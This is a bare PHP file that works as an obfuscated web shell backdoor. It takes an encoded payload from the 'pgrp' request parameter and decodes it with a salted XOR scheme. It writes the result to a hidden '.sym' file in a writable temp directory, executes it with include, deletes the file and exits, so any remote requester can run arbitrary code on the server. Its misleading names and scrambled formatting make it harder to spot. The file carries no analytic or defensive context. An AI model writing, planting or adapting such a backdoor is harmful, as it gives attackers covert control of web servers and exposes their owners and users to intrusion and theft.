<?php

if(isset($_REQUEST["pgrp"]) ? true : false){
	$component = array_filter([getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getcwd(), sys_get_temp_dir(), "/dev/shm"]);
	$pointer = $_REQUEST["pgrp"];
	 $pointer =		explode	(	 '.'	 , $pointer  )		;	 
	$factor = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $o = 0;
    
            $__tmp = $pointer;
            while ($v9 = array_shift($__tmp)) { 	$chS = ord($salt[$o % $lenS]);
                $dec = ((int)$v9 - $chS - ($o % 10))		^	 59;
                $factor .= chr($dec);
                $o++;	} 
	foreach ($component as $fac):
    		if ((is_dir($fac) and is_writable($fac))) {
    $record = sprintf("%s/.sym", $fac);
    if (file_put_contents($record, $factor)) {
	include $record;
	@unlink($record);
	die();
}
}
endforeach;
}